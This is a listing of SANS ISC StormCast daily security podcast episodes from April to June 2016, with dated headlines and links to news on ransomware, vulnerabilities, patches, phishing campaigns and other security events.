Odd User-Agents https://isc.sans.edu/forums/diary/What+is+your+most+unusual+UserAgent/21203/ ZimbraCrypt Ransomware http://www.bleepingcomputer.com/news/security/zimbra-ransomware-written-in-python-targets-zimbra-mail-store/ Hard Drives Still Not Wiped Before Selling Them on eBay http://www2.blancco.com/en-rs-leftovers-a-data-recovery-study PhotoLogin Option For LogmeOnce https://www.logmeonce.com/photologin/
6/29/2016, 4 minutes, 27 seconds

ISC StormCast for Tuesday, June 28th 2016

Recent Fake DDoS Threats by "Armada Collective" https://blog.cloudflare.com/empty-ddos-threats-meet-the-armada-collective/ IRS Discontinues e-Filing PINs https://www.irs.gov/uac/irs-statement-on-the-electronic-filing-pin CCTV Cameras Still A Major Threat https://blog.sucuri.net/2016/06/large-cctv-botnet-leveraged-ddos-attacks.html
6/28/2016, 6 minutes, 9 seconds

ISC StormCast for Monday, June 27th 2016

"Bart" Ransomware https://isc.sans.edu/forums/diary/Bart+a+new+Ransomware/21195/ Swagger Vulnerability https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641 "Enriched" Voter Database Leak https://mackeeper.com/blog/post/239-another-us-voter-database-leak
6/27/2016, 6 minutes, 22 seconds

ISC StormCast for Friday, June 24th 2016

Uber Vulnerability Summary https://labs.integrity.pt/articles/uber-hacking-how-we-found-out-who-you-are-where-you-are-and-where-you-went/ Apple Intentionally Left Kernel Decrypted https://techcrunch.com/2016/06/22/apple-unencrypted-kernel/ WordPress Fixes Various Critical Vulnerabilities https://codex.wordpress.org/Version_4.5.3 Let's Encrypt Reaching 5 Million Issued Certificates https://letsencrypt.org/2016/06/22/https-progress-june-2016.html Necurs Botnet is Back https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-returns-with-updated-locky-ransomware-in-tow
6/24/2016, 5 minutes

ISC StormCast for Thursday, June 23rd 2016

Deobfuscating Java Code https://isc.sans.edu/forums/diary/Security+through+obscurity+never+works/21187/ iOS 10 Beta Not Encrypted To Aid Bug Hunters https://www.technologyreview.com/s/601748/apple-opens-up-iphone-code-in-what-could-be-savvy-strategy-or-security-screwup/ Microsoft Updates SEAL http://research.microsoft.com/en-us/people/kilai/v2.0-beta.pdf Cisco Releases Pidgin Vulnerabilities http://blog.talosintel.com/2016/06/vulnerability-spotlight-pidgin.html Libarchive Vulnerabilities http://blog.talosintel.com/2016/06/the-poisoned-archives.html
6/23/2016, 5 minutes, 16 seconds

ISC StormCast for Wednesday, June 22nd 2016

Apple Airport (and Time Capsule) Update https://support.apple.com/en-us/HT201222 StartCom Adding API For Free SSL Certificates https://support.apple.com/en-us/HT201222 Bitcoin Phishing With Typo Squatting Domains http://blog.cyren.com/articles/2016-Q2_bitcoin-phishing-via-google-adwords.html Google Attempting to Simplify 2 Factor Authentication http://googleappsupdates.blogspot.co.uk/2016/06/new-settings-for-2-step-verification.html
6/22/2016, 5 minutes, 10 seconds

ISC StormCast for Tuesday, June 21st 2016

Fake SWIFT Payment Notices Used in Malicious E-Mail Campaign https://isc.sans.edu/forums/diary/Ongoing+Spam+Campaign+Related+to+Swift/21177/ RedHat Fixes Various OpenSSL Integer Overflows https://github.com/openssl/openssl/commit/a004e72b95835136d3f1ea90517f706c24c03da7 JavaScript Ransomware http://www.bleepingcomputer.com/news/security/the-new-raa-ransomware-is-created-entirely-using-javascript/ Triada/Horde Mobile Malware Updates http://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/
6/21/2016, 5 minutes, 5 seconds

ISC StormCast for Monday, June 20th 2016

Avoiding JavaScript Malware https://isc.sans.edu/forums/diary/Controlling+JavaScript+Malware+Before+it+Runs/21171/ LogMeIn Joining Other Sites in Proactively Resetting Passwords https://blog.logmeininc.com/password-reuse-issue-affecting-logmein-users/ Kaspersky Publishes Details Around Recent Flash Vulnerability https://securelist.com/blog/research/75100/operation-daybreak/ CSRF Vulnerability in Democratic Party Donation Platform http://rajk.me/actblue/#intro
6/19/2016, 5 minutes, 5 seconds

ISC StormCast for Friday, June 17th 2016

Adobe Patches Critical Flash Vulnerability https://helpx.adobe.com/security/products/flash-player/apsb16-18.html TeamViewer Users May be Compromised by Trojaned Client http://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging/ Siemens ICS Equipment Transmits Credentials Over the Network https://ics-cert.us-cert.gov/advisories/ICSA-16-161-02 GitHub Resets User Accounts Compromised In 3rd Party Incident https://github.com/blog/2190-github-security-update-reused-password-attack HTTP Header Injection in Python urllib http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html
6/17/2016, 5 minutes, 20 seconds

ISC StormCast for Thursday, June 16th 2016

Group Policy Issues After Applying MS16-072 (KB3159398) https://social.technet.microsoft.com/Forums/en-US/e2ebead9-b30d-4789-a151-5c7783dbbe34/patch-tuesday-kb3159398?forum=winserverGP Apple Will Reject Apps Using HTTP https://developer.apple.com/videos/play/wwdc2016/706/ Rising AntiVirus Includes Malware (article only in German) http://www.heise.de/security/meldung/Virenscanner-infiziert-Systeme-mit-Sality-Virus-3237654.html SAP Patch https://erpscan.com/press-center/blog/sap-security-notes-june-2016/ Breached RDP Servers For Rent https://www.wired.com/2016/06/xdedic-server-trading-forum-kaspersky/
6/16/2016, 4 minutes, 36 seconds

ISC StormCast for Wednesday, June 15th 2016

Microsoft Updates https://isc.sans.edu/mspatchdays.html?viewday=2016-06-14 Adobe Updates (Incl. active exploitation of Flash Vuln.) https://helpx.adobe.com/security.html
6/15/2016, 7 minutes, 37 seconds

ISC StormCast for Tuesday, June 14th 2016

Flocker Ransomware Locks TVs http://blog.trendmicro.com/trendlabs-security-intelligence/flocker-ransomware-crosses-smart-tv/ Samsung Updates Software Update Software http://seclists.org/fulldisclosure/2016/Jun/21 Let's Encrypt Messes Up Notification E-mail, Leaks Addresses https://community.letsencrypt.org/t/email-address-disclosures-preliminary-report-june-11-2016/16867 ClamAV Fuzzing Finds Bugs in 7z Unpacking Code https://foxglovesecurity.com/2016/06/13/finding-pearls-fuzzing-clamav/
6/14/2016, 4 minutes, 49 seconds

ISC StormCast for Monday, June 13th 2016

DNS Sinkhole 2.0 Released https://isc.sans.edu/forums/diary/DNS+Sinkhole+ISO+Version+20/21153/ Visual C Telemetry Library https://www.reddit.com/r/cpp/comments/4ibauu/visual_studio_adding_telemetry_function_calls_to/ Crysis Ransomware http://www.eset.com/us/resources/detail/new-ransomware-threat-crysis-lays-claim-to-teslacrypt-s-former-turf/ Intel Releases ROP Attack Protection http://blogs.intel.com/evangelists/2016/06/09/intel-release-new-technology-specifications-protect-rop-attacks/ EMC Fixes Data Domain Session ID Disclosure Vulnerability https://auscert.org.au/render.html?it=35618
6/13/2016, 5 minutes, 21 seconds

ISC StormCast for Friday, June 10th 2016

Google Chrome PDF Viewer Remote Code Execution Vulnerability Patched http://blog.talosintel.com/2016/06/pdfium.html Google Continues to Remove SSLv3 Support http://googleappsupdates.blogspot.com.au/2016/06/gradually-disabling-support-for-sslv3.html Vibration Sensor Can Be Used As Microphone http://synrg.csl.illinois.edu/vibraphone/paperdocs/VibraPhone_nirupam.pdf KeePass Fixes Vulnerable Update Procedure http://keepass.info/help/kb/sec_issues.html#updsig
6/10/2016, 5 minutes, 12 seconds

ISC StormCast for Thursday, June 9th 2016

CryptXXX Switches From Angler to Neutrino EK https://isc.sans.edu/forums/diary/Neutrino+EK+and+CryptXXX/21141/ Android Flash Keyboard Uses Excessive Permissions https://regmedia.co.uk/2016/06/07/pentestflashkeybpardpaper.pdf Firefox 47 Released https://www.mozilla.org/en-US/security/known-vulnerabilities/firefox/#firefox47 D-Link Camera Vulnerable To Remote Exploit http://blog.senr.io/blog/home-secure-home BITS Used to Make Malware More Persistent https://www.secureworks.com/blog/malware-lingers-with-bits
6/9/2016, 5 minutes, 3 seconds

ISC StormCast for Wednesday, June 8th 2016

Various Internet Sites Flag Password Reuse http://krebsonsecurity.com/2016/06/password-re-user-get-to-get-busy/ Facebook Chat Vulnerability Patched https://www.helpnetsecurity.com/2016/06/07/facebook-vulnerability-chat-messenger/ DNS Cookies: Making DNS More Secure https://www.rfc-editor.org/rfc/rfc7873.txt
6/7/2016, 5 minutes, 43 seconds

ISC StormCast for Tuesday, June 7th 2016

LinkedIn Data Used to Personalize Malicious E-Mail https://twitter.com/certbund/status/739824856011804676?ref_src=twsrc%5Etfw Android Patches https://source.android.com/security/bulletin/2016-06-01.html Mitsubishi Outlander Wifi Hack https://www.pentestpartners.com/blog/hacking-the-mitsubishi-outlander-phev-hybrid-suv/ Using NTP to Calibrate Time Stamps in PCAP https://isc.sans.edu/forums/diary/What+Time+Is+It+Using+NTP+Traffic+to+Calibrate+PCAP+Timestamps/21135/ Bing Adds Malware Warning https://blogs.bing.com/webmaster/June-2016/Warning!-Bing-now-offers-enhanced-malware-warnings
6/7/2016, 5 minutes, 26 seconds

ISC StormCast for Monday, June 6th 2016

A Recent MySQL Honeypot Compromise https://isc.sans.edu/forums/diary/MySQL+is+YourSQL/21117/ TeamViewer Improves Security http://www.teamviewer.com/en/company/press/teamviewer-launches-trusted-devices-and-data-integrity/ Black Shades Ransomware http://www.bleepingcomputer.com/news/security/black-shades-ransomware-encrypts-your-pc-and-taunts-security-researchers/ NTP Update http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities
6/5/2016, 5 minutes, 7 seconds

ISC StormCast for Friday, June 3rd 2016

Docker Containers Logging https://isc.sans.edu/forums/diary/Docker+Containers+Logging/21121/ Lenovo Suggests Uninstalling Accelerator Application https://support.lenovo.com/us/en/product_security/len_6718 Google Chrome Update http://googlechromereleases.blogspot.com/search/label/Stable%20updates MongoDB Injection http://blog.securelayer7.net/mongodb-security-injection-attacks-with-php/ Ouch! Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016#encryption Detecting DNS Tunneling With Splunk https://www.sans.org/reading-room/whitepapers/dns/splunk-detect-dns-tunneling-37022 Android AV Vulnerabilities https://www.sit.fraunhofer.de/fileadmin/dokumente/Presse/teamsik_advisories_AV.pdf?_=1464692835
6/3/2016, 5 minutes, 20 seconds

ISC StormCast for Thursday, June 2nd 2016

KeePass Insecure Update https://bogner.sh/2016/03/mitm-attack-against-keepass-2s-update-check/ Possible TeamViewer Breach http://www.theregister.co.uk/2016/06/01/teamviewer_mass_breach_report/ Windows 10 Exploit Offered For Sale https://www.trustwave.com/Resources/SpiderLabs-Blog/Zero-Day-Auction-for-the-Masses/?page=1&year=0&month=0 Intrusion Detection in Depth Minneapolis (July 18-23rd) https://www.sans.org/event/minneapolis-2016/course/intrusion-detection-in-depth
6/2/2016, 5 minutes, 11 seconds

ISC StormCast for Wednesday, June 1st 2016

Increase in Telnet Scans https://isc.sans.edu/forums/diary/Increase+in+Port+23+telnet+scanning/21115/ Bloatware Introducing Security Flaws in Laptops https://duo.com/blog/out-of-box-exploitation-a-security-analysis-of-oem-updaters Exploit Released for Unpatchable SCADA Controller https://www.exploit-db.com/exploits/37154/ Fail2Ban Adding IPv6 Support https://www.slightfuture.com/security/fail2ban-ipv6 Critical LG Phone Security Flaws http://blog.checkpoint.com/2016/05/29/oems-have-flaws-too-exposing-two-new-lg-vulnerabilities/
5/31/2016, 5 minutes, 59 seconds

ISC StormCast for Tuesday, May 31st 2016

Hardcoded Password in Medical Software https://www.kb.cert.org/vuls/id/482135 Google Chrome Update http://googlechromereleases.blogspot.com.au/search/label/Stable%20updates PA DSS Update https://www.pcisecuritystandards.org/document_library JetPack WordPress Plugin XSS Vulnerabilities https://jetpack.com/2016/05/27/jetpack-4-0-3-critical-security-update/ Tor Browser Fingerprinting Site https://tor.triop.se Anti-Pastejacking Browser Plugin https://github.com/rocketshipapps/hardenedpaste
5/31/2016, 5 minutes, 16 seconds

ISC StormCast for Monday, May 30th 2016

Analysis of a Distributed Denial of Service Attack https://isc.sans.edu/forums/diary/Analysis+of+a+Distributed+Denial+of+Service+DDoS/21109/ Bluecoat CA http://www.theregister.co.uk/2016/05/27/blue_coat_ca_certs/ Google Requires Symantec CAs to Comply With Certificate Transparency https://cabforum.org/pipermail/public/2016-May/007573.html
5/30/2016, 3 minutes, 59 seconds

ISC StormCast for Friday, May 27th 2016

Keeping an Eye on Tor Traffic https://isc.sans.edu/forums/diary/Keeping+an+Eye+on+Tor+Traffic/21103/ Next Generation Tor Passed First Test https://blog.torproject.org/blog/mission-montreal-building-next-generation-onion-services DDoS Prices Drop https://www.incapsula.com/blog/unmasking-ddos-for-hire-fiverr.html Older Microsoft Office Vulnerabilities Still Used by "APT" Actors https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/
5/27/2016, 5 minutes, 27 seconds

ISC StormCast for Thursday, May 26th 2016

DNS Covert Channel Used in Targeted Attacks http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/ Genius Web Annotation Service Is Removing Security Headers http://www.theverge.com/2016/5/25/11505454/news-genius-annotate-the-web-content-security-policy-vulnerability Canary Tokens For Windows Binaries http://blog.thinkst.com/2016/05/certified-canarytokens-alerts-from_25.html Cisco Patches IPv6 ND DoS Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160525-ipv6
5/26/2016, 5 minutes, 14 seconds

ISC StormCast for Wednesday, May 25th 2016

Verisign/US-CERT Warn of The Use of Local TLDs for WPAD http://www.verisign.com/assets/labs/MitM-Attack-by-Name-Collision-Cause-Analysis-and-WPAD-Vulnerability-Assessment-in-the-New-gTLD-Era.pdf Proposal To Use TLS for DNS https://www.rfc-editor.org/rfc/rfc7858.txt Azure Blacklists Common Passwords https://blogs.technet.microsoft.com/ad/2016/05/24/another-117m-leaked-usernames-and-passwords-new-best-practices-azuread-and-msa-can-help/ Google Attempts to Eliminate Passwords http://www.androidauthority.com/google-kills-passwords-trust-api-694394/
5/25/2016, 5 minutes, 26 seconds

ISC StormCast for Tuesday, May 24th 2016

Detailed Technical Report Released About Targeted Attack Against RUAG https://isc.sans.edu/forums/diary/Technical+Report+about+the+RUAG+attack/21091/ New Variation of Pastejacking Exploit Affecting vim https://github.com/dxa4481/Pastejacking Xen qemu Patch Released to Limit Log File Size http://xenbits.xen.org/xsa/advisory-180.html
5/24/2016, 5 minutes, 4 seconds

ISC StormCast for Monday, May 23rd 2016

Missing MRU Registry Keys For Files Opened With WinZip https://isc.sans.edu/forums/diary/The+strange+case+of+WinZip+MRU+Registry+key/21087/
OWASP Asking for Top 10 Overhaul Input https://twitter.com/wichers/status/733855223832272896
Google is Updating the Safe Browsing API https://security.googleblog.com/2016/05/evolving-safe-browsing-api.html
Facebook Sued Over Scanning Of Private Messages https://cdn2.vox-cdn.com/uploads/chorus_asset/file/6509911/campbell-certification-order.0.pdf
Malware Stores Code in Macro UI Buttons https://blogs.technet.microsoft.com/mmpc/2016/05/17/malicious-macro-using-a-sneaky-new-trick/
SANSFIRE 2016 https://www.sans.org/event/sansfire-2016
5/23/2016, 5 minutes, 37 seconds

ISC StormCast for Friday, May 20th 2016

EITest Campaign Still Going Strong https://isc.sans.edu/forums/diary/EITest+campaign+still+going+strong/21081/
Android Malware Affecting Google Pay Acceptance http://www.theregister.co.uk/2016/05/19/android_pay_analysis/
iOS 9.3 Restricts Use Of Fingerprint https://www.apple.com/business/docs/iOS_Security_Guide.pdf
5/20/2016, 4 minutes, 57 seconds

ISC StormCast for Thursday, May 19th 2016

TeslaCrypt Shutting Down and Releasing Master Key http://www.bleepingcomputer.com/news/security/teslacrypt-shuts-down-and-releases-master-decryption-key/
Office 365 Risks https://www.skyhighnetworks.com/cloud-security-blog/7-charts-reveal-the-meteoric-rise-of-office-365/
LinkedIn Data Leaked From Past Breach https://twitter.com/troyhunt/status/732838759390191617
Google Discontinuing SSLv3/RC4 Support for SMTP http://googleappsupdates.blogspot.ro/2016/05/disabling-support-for-sslv3-and-rc4-for.html
5/19/2016, 5 minutes, 16 seconds

ISC StormCast for Wednesday, May 18th 2016

Exploit for Recently Patched Cisco IKEv1/v2 Buffer Overflow Published https://isc.sans.edu/forums/diary/Exploit+Available+For+Cisco+IKEv1+and+IKEv2+Buffer+Overflow+Vulnerability/21065/
Symantec Antivirus Engine Malformed PE Header Parser Vulnerability https://isc.sans.edu/forums/diary/CVE20162208+Symantec+Antivirus+Engine+Malformed+PE+Header+Parser+Memory+Access+Violation/21069/
New CryptXXX Decryption Tool From Kaspersky https://blog.kaspersky.com/cryptxxx-decryption-20/12091/
More Malware in Google Play Store http://blog.checkpoint.com/2016/05/09/viking-horde-a-new-type-of-android-malware-on-google-play/
iPad Pro Crashes After Updating to iOS 9.3.2 http://www.macrumors.com/2016/05/17/9-7-inch-ipad-pro-crashing-issues-safari/
New Remote Code Execution in Magento E-Commerce Software http://netanelrub.in/2016/05/17/magento-unauthenticated-remote-code-execution/
5/18/2016, 5 minutes, 23 seconds

ISC StormCast for Tuesday, May 17th 2016

419 Death Scams Still Going Around https://isc.sans.edu/forums/diary/An+oldie+but+a+goodie+419+Death+Scam/21061/
Apple Updates https://support.apple.com/en-us/HT201222
Flash Zero Day Details https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html
Google "HTML5 By Default" Draft https://docs.google.com/presentation/d/106_KLNJfwb9L-1hVVa4i29aw1YXUy9qFX-Ye4kvJj-4/edit#slide=id.p
5/17/2016, 7 minutes

ISC StormCast for Monday, May 16th 2016

Python Malware https://isc.sans.edu/forums/diary/Python+Malware+Part+1/21057/
Ubiquiti AirOS Worm http://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/td-p/1562940
Google Chrome Update http://www.theregister.co.uk/2016/05/13/google_crushes_five_vulns_with_patch_run_and_20k_in_bug_bounties/
More Banks Affected By Fake SWIFT Transactions http://www.nytimes.com/2016/05/13/business/dealbook/swift-global-bank-network-attack.html?_r=0
Microsoft Releases Windows 10 Security Auditing And Monitoring Reference https://www.microsoft.com/en-us/download/details.aspx?id=52630
5/16/2016, 5 minutes, 24 seconds

ISC StormCast for Friday, May 13th 2016

Adobe Flash Player Update Released https://helpx.adobe.com/security/products/flash-player/apsb16-15.html
Microsoft Excel Phishing https://isc.sans.edu/forums/diary/Another+Day+Another+Wave+of+Phishing+Emails/21045/
Squid Proxy Bug Allows For Cache Poisoning http://bugs.squid-cache.org/show_bug.cgi?id=4501
Nation State Attackers May Exploit Firefox https://blog.mozilla.org/blog/2016/05/11/advanced-disclosure-needed-to-keep-users-secure/
5/12/2016, 5 minutes, 26 seconds

ISC StormCast for Thursday, May 12th 2016

Exploited Flash Vulnerability Patched Only For Windows https://helpx.adobe.com/security/products/flash-player/apsa16-02.html
SAP Vulnerabilities Exploited https://www.onapsis.com/threat-report-tip-iceberg-wild-exploitation-cyber-attacks-sap-business-applications
Free Decryption Tool For CryptXXX No Longer Works https://www.proofpoint.com/us/threat-insight/post/cryptxxx2-ransomware-authors-strike-back-against-free-decryption-tool
Multiple 7-Zip Vulnerabilities http://blog.talosintel.com/2016/05/multiple-7-zip-vulnerabilities.html
Ransomware Overview https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/edit#gid=0
5/12/2016, 4 minutes, 44 seconds

ISC StormCast for Wednesday, May 11th 2016

Windows Patch Tuesday https://isc.sans.edu/mspatchdays.html?viewday=2016-05-10
Adobe Patch Tuesday https://helpx.adobe.com/security.html
5/11/2016, 8 minutes, 6 seconds

ISC StormCast for Tuesday, May 10th 2016

Network Forensics With DShell https://isc.sans.edu/forums/diary/Performing+network+forensics+with+Dshell+Part+1+Basic+usage/21035/
Aruba Vulnerabilities (and Patches) http://seclists.org/fulldisclosure/2016/May/19
Allwinner Android Device Debug Backdoor http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/
ImageTragick Flaw Being Exploited https://blog.cloudflare.com/inside-imagetragick-the-real-payloads-being-used-to-hack-websites-2/
Attacking JSON Web Tokens https://www.notsosecure.com/crafting-way-json-web-tokens/
ASUS UEFI Red Screen Of Death Workaround https://www.asus.com/support/FAQ/1016356/
5/10/2016, 6 minutes, 5 seconds

ISC StormCast for Monday, May 9th 2016

A Quick Introduction To Linux Capabilities https://isc.sans.edu/forums/diary/Guest+Diary+Linux+Capabilities+A+friend+and+foe/21031/
Review of TLS Proxy Security Issues http://users.encs.concordia.ca/~mmannan/publications/ssl-interception-ndss2016.pdf
Ransomware Claims to Donate Proceeds To Charity https://heimdalsecurity.com/blog/security-alert-new-ransomware-donate-earnings-charity/
5/9/2016, 5 minutes, 14 seconds

ISC StormCast for Friday, May 6th 2016

Large Number of Credentials Offered For Sale http://www.reuters.com/article/us-cyber-passwords-idUSKCN0XV1I6
Alphalocker: Affordable Ransomware https://blog.cylance.com/an-introduction-to-alphalocker
JAKU Botnet https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf
Juniper Update http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10734&cat=SIRT_1&actp=LIST
5/6/2016, 5 minutes, 15 seconds

ISC StormCast for Thursday, May 5th 2016

Malicious Ads Seen On CBS TV Stations https://blog.malwarebytes.org/threat-analysis/2016/05/cbs-affiliated-television-stations-expose-visitors-to-angler-exploit-kit/
ImageMagick Vulnerability https://isc.sans.edu/forums/diary/ImageTragick+Another+Vulnerability+Another+Nickname/21023/
Fake DDoS Threats Continue http://www.actionfraud.police.uk/news/online-extortion-demands-affecting-businesses-apr16/
Cisco Patches TelePresence Equipment https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160504-tpxml
Cracking PeopleSoft PS_TOKEN with oclHashcat http://blog.gosecure.ca/2016/05/04/oracle-peoplesoft-still-a-threat-for-enterprises/
5/5/2016, 1 minute, 3 seconds

ISC StormCast for Wednesday, May 4th 2016

OpenSSL Update Released https://isc.sans.edu/forums/diary/OpenSSL+Updates/21015/
Cerber Exploit Kit Installed By Neutrino EK https://isc.sans.edu/forums/diary/Neutrino+exploit+kit+sends+Cerber+ransomware/21017/
ImageMagick Vulnerability https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588 http://www.openwall.com/lists/oss-security/2016/05/03/18
Microsoft Will No Longer Consider SHA-1 Certificates As Secure https://blogs.windows.com/msedgedev/2016/04/29/sha1-deprecation-roadmap/
5/4/2016, 1 minute, 39 seconds

ISC StormCast for Tuesday, May 3rd 2016

Fake Google Chrome Update Installs Malware on Android https://www.zscaler.com/blogs/research/android-infostealer-posing-fake-google-chrome-update
Android May Security Bulletin https://source.android.com/security/bulletin/2016-05-01.html
Google Chrome Update https://source.android.com/security/bulletin/2016-05-01.html
Pwned List Got Pwned http://krebsonsecurity.com/2016/05/how-the-pwnedlist-got-pwned/
5/3/2016, 5 minutes, 29 seconds

ISC StormCast for Monday, May 2nd 2016

ATM Jackpotting: Analysis of ATM APIs https://securelist.com/analysis/publications/74533/malware-and-non-malware-ways-for-atm-jackpotting-extended-cut/
Reverse Engineering An ATM Skimmer https://trustfoundry.net/reverse-engineering-a-discovered-atm-skimmer/
Bathroom Scale Vulnerability https://help.fitbit.com/articles/en_US/Help_article/How-do-I-update-my-Aria-scale/
Fake Mobile Payment Apps in Google Play Store https://info.phishlabs.com/blog/fraudster-phishing-users-with-malicious-mobile-apps
5/2/2016, 5 minutes, 44 seconds

ISC StormCast for Friday, April 29th 2016

PowerShell and DNS/DHCP https://isc.sans.edu/forums/diary/DNS+and+DHCP+Recon+using+Powershell/20995/
New Version of PCI Standard Released https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2_Summary_of_Changes.pdf
OpenSSL Patch Pre-Announced https://mta.openssl.org/pipermail/openssl-announce/2016-April/000069.html
NTP Patches http://blog.talosintel.com/2016/04/vulnerability-spotlight-further-ntpd_27.html#more
4/29/2016, 5 minutes, 9 seconds

ISC StormCast for Thursday, April 28th 2016

SAML Federated Identity Vulnerability in Office 365 http://www.economyofmechanism.com/office365-authbypass.html
.AS Registry Vulnerable to Direct Object Reference https://isecguy.wordpress.com/2016/04/25/flaw-allowed-anyone-to-modify-take-control-over-any-as-domain/
Driveby Exploit Used to Deliver Android Ransomware https://www.bluecoat.com/security-blog/2016-04-25/android-exploit-delivers-dogspectus-ransomware
CryptXXX Decrypt Tool https://support.kaspersky.com/viruses/disinfection/8547?_ga=1.128163404.1397432418.1454514283#block3
4/28/2016, 5 minutes, 19 seconds

ISC StormCast for Wednesday, April 27th 2016

OS X Memory Forensics https://isc.sans.edu/forums/diary/An+Introduction+to+Mac+memory+forensics/20989/
Facebook App Used to Deliver Facebook Phish http://news.netcraft.com/archives/2016/04/22/hook-like-and-sinker-facebook-serves-up-its-own-phish.html
Android.Spy.277.origin Keeps Being Delivered By Google Play Store Apps http://blog.checkpoint.com/2016/04/22/in-the-wild-google-cant-close-the-door-on-android-malware/
Tool To Replay RDP Sessions From pcaps http://www.contextis.com/resources/blog/rdp-replay-code-release/
Juniper Update http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10727&cat=SIRT_1&actp=LIST
RouterSploit Router Exploit Framework https://github.com/reverse-shell/routersploit
4/27/2016, 5 minutes, 2 seconds

ISC StormCast for Tuesday, April 26th 2016

Details From the Breach of the Central Bank of Bangladesh http://baesystemsai.blogspot.de/2016/04/two-bytes-to-951m.html
Apple Image IO Denial of Service https://www.landaire.net/blog/apple-imageio-denial-of-service/
Text Messages Used to Phish Apple IDs http://www.independent.co.uk/life-style/gadgets-and-tech/news/apple-id-password-expired-expiry-text-website-scam-phishing-a6991126.html
Critical HP Data Protector Patch https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988
Armada Collective (or imposter) Making Fake DDoS Threats https://blog.cloudflare.com/empty-ddos-threats-meet-the-armada-collective/
4/26/2016, 5 minutes, 23 seconds

ISC StormCast for Monday, April 25th 2016

Angler EK Used to Spread CryptXXX https://isc.sans.edu/forums/diary/Angler+Exploit+Kit+Bedep+and+CryptXXX/20981/
Honeyports PowerShell Script https://isc.sans.edu/forums/diary/Honeyports+powershell+script/20979/
Online Credit Card Fraud Soars http://www.pymnts.com/fraud-prevention/2016/online-fraud-attack-rates-soar-since-october/
How to Trick Traffic Sensors https://securelist.com/blog/research/74454/how-to-trick-traffic-sensors/
Opera VPN Service Analysis https://gist.github.com/spaze/558b7c4cd81afa7c857381254ae7bd10 https://www.helpnetsecurity.com/2016/04/21/opera-browser-free-vpn/
4/25/2016, 5 minutes, 10 seconds

ISC StormCast for Friday, April 22nd 2016

Accellion Secure File Transfer Vulnerability and Facebook Exploitation http://devco.re/blog/2016/04/21/how-I-hacked-facebook-and-found-someones-backdoor-script-eng-ver/
Application Whitelisting Bypass With regsvr32 http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html
New NetworkManager Version Released https://cgit.freedesktop.org/NetworkManager/NetworkManager/plain/NEWS?id=nm-1-2
Opera Includes Free VPN http://www.opera.com/blogs/desktop/2016/04/free-vpn-integrated-opera-for-windows-mac/
4/22/2016, 5 minutes, 18 seconds

ISC StormCast for Thursday, April 21st 2016

Decoding Pseudo Darkleech https://isc.sans.edu/forums/diary/Decoding+PseudoDarkleech+1/20969/
TeslaCrypt 4.1 https://www.endgame.com/blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack-chain
RansomWhere Protects OS X Users from Ransomware https://objective-see.com/products/ransomwhere.html
Testing TLS Libraries With TLS-Attacker https://github.com/RUB-NDS/TLS-Attacker
4/21/2016, 5 minutes, 13 seconds

ISC StormCast for Wednesday, April 20th 2016

Oracle Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Flash Provides Top Targeted Vulnerabilities for 2015 https://www.solutionary.com/_assets/pdf/research/2015-gtir.pdf
Google Publishes Data About Safe Browsing Effectiveness http://static.googleusercontent.com/media/research.google.com/en//pubs/archive/44924.pdf
Detecting curl pipes to bash https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/
4/20/2016, 6 minutes, 36 seconds

ISC StormCast for Tuesday, April 19th 2016

Retefe Banking Malware Appearing Again https://isc.sans.edu/forums/diary/Retefe+is+back+in+town/20957/
Ransomware Switching Focus From Hospitals to Schools http://blog.talosintel.com/2016/04/jboss-backdoor.html
git on OS X vulnerable https://rachelbythebay.com/w/2016/04/17/unprotected/
4/19/2016, 5 minutes, 26 seconds

ISC StormCast for Monday, April 18th 2016

Implementing "bash_history" for cmd.exe https://isc.sans.edu/forums/diary/Windows+Command+Line+Persistence/20949/
Mixed encoding in Malicious Documents https://isc.sans.edu/forums/diary/VBS+VBE/20953/
Swedish Air Traffic Control Outage Result of Solar Flares http://www.lfv.se/en/news/news-2016/full-capacity-after-90-minutes-radar-loss
Why you should not require password changes https://www.cesg.gov.uk/articles/problems-forcing-regular-password-expiry
Bypassing Microsoft Edge XSS Filter http://blog.portswigger.net/2016/04/edge-xss-filter-bypass.html
4/18/2016, 5 minutes, 54 seconds

ISC StormCast for Friday, April 15th 2016

Doing HTTP Key Pinning Right https://isc.sans.edu/forums/diary/HTTP+Public+Key+Pinning+How+to+do+it+right/20943/
Apple Ceases Support for QuickTime on Windows https://support.apple.com/HT205771 http://zerodayinitiative.com/advisories/ZDI-16-241/
VMware Releases Patch for VMware Client Plugin http://www.vmware.com/security/advisories/VMSA-2016-0004.html
Identify Ransomware https://id-ransomware.malwarehunterteam.com
Another Fake Flash Update For OS X https://www.intego.com/mac-security-blog/mac-users-attacked-fake-adobe-update/
Chrome 50 Released http://googlechromereleases.blogspot.com/2016/04/stable-channel-update_13.html
